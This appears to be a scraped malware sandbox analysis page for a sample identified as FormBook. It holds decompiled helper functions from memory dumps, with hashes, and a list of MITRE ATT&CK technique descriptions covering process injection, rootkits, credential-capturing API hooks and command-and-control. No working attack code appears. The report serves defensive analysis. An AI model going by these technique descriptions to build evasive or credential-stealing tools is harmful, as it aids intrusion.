String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 04538c6c8955efea4ad5d36306cf2b5c42cc4584cd40b17c12dd08cc11123b78
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 5BC01232080248BBCB226E81CD00F067B2AEBA4B60F008010BA080B5608A3AE970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 02A976E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A976E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x02a976e4
0x00000000
0x02a976f8
0x02a976fd

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: d243d4d6ae33dd3cc43085ebc2a8c0a7733b4f13ac8841579d32c7548cdd959a
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: F5C08CB01A12809AEF2A5709CE60B35B690BF08708F48059CAB010A4A1CB68B802C618

Uniqueness

Uniqueness Score: -1.00%

Function 02AB36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AB36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x02ab36d2
0x02ab36e8
0x02ab36d4
0x02ab36e5
0x02ab36e5

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: a4f0642989b0c8f14f3cc35fefb1e923b54e8064a4ff1dcd023741928cc3b687
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 54C02BB0190440BBDB161F30CE60F15B258FF00B21F6403947220464F0EF689C00D500

Uniqueness

Uniqueness Score: -1.00%

Function 02AA3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AA3A1C(intOrPtr _a4) {
				void* _t5;

				return L02AA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x02aa3a35

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: bf7a79f64e9badb518872cf673a480a4e2128a7bd9ae510f667fb7acaf985bc9
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 70C04C32180648BBC7126E45DD11F15BB6AEB94B60F154021B6040B5619A76ED61D998

Uniqueness

Uniqueness Score: -1.00%

Function 02A8AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A8AD30(intOrPtr _a4) {

				return L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x02a8ad49

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: a2fa97778afdd289fe42c8f9ebcd150da6baec11707fd32bf282fba29760a428
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 25C08C320C0248BBC7126B45CE00F16BB2AEB90B60F000020B6040B6618A32EC60D988

Uniqueness

Uniqueness Score: -1.00%

Function 02AA7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AA7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x02aa7d56
0x02aa7d5b
0x02aa7d60
0x02aa7d5d
0x02aa7d5d
0x02aa7d5d

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: a45cbb3a5530c9eec1a392f4ec36b314d85f8aa92377b9d39ca762f9130f5a75
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 53B09234301A408FCE16DF18C490B1A73E4BB44A40B8400D4E400CBA20D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 02AB2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AB2ACB() {
				void* _t5;

				return E02A9EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x02ab2adc

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 81d13b6f6d8219bc6f32724b7a3941ba1983f6da78d29d6b4c74eddb74625987
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: CEB01232D50440CFCF02EF40C710B1973B2FB00750F058491910127D31C629AC01CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02B1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02B1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02ACCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02B15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02B15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02b1fdda
0x02b1fde2
0x02b1fde5
0x02b1fdec
0x02b1fdfa
0x02b1fdff
0x02b1fe0a
0x02b1fe0f
0x02b1fe17
0x02b1fe1e
0x02b1fe19
0x02b1fe19
0x02b1fe19
0x02b1fe20
0x02b1fe21
0x02b1fe22
0x02b1fe25
0x02b1fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B1FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02B1FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02B1FE2B

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 156a8219bdbf98a6f4e3e74232fe676ad6c1df0e78ede5b9fa3727ab63f3ced6
Instruction ID: d1a2bfb59c17bd235daa17f45a1a8a1c2ecc4fc4d0fe2933f5345855851973a9
Opcode Fuzzy Hash: 156a8219bdbf98a6f4e3e74232fe676ad6c1df0e78ede5b9fa3727ab63f3ced6
Instruction Fuzzy Hash: 73F0CD72240201BBEA311A55DC02F23BB6BEB84730F640255FA28565E1EA62A860DBA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report GiG35Rwmz6

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph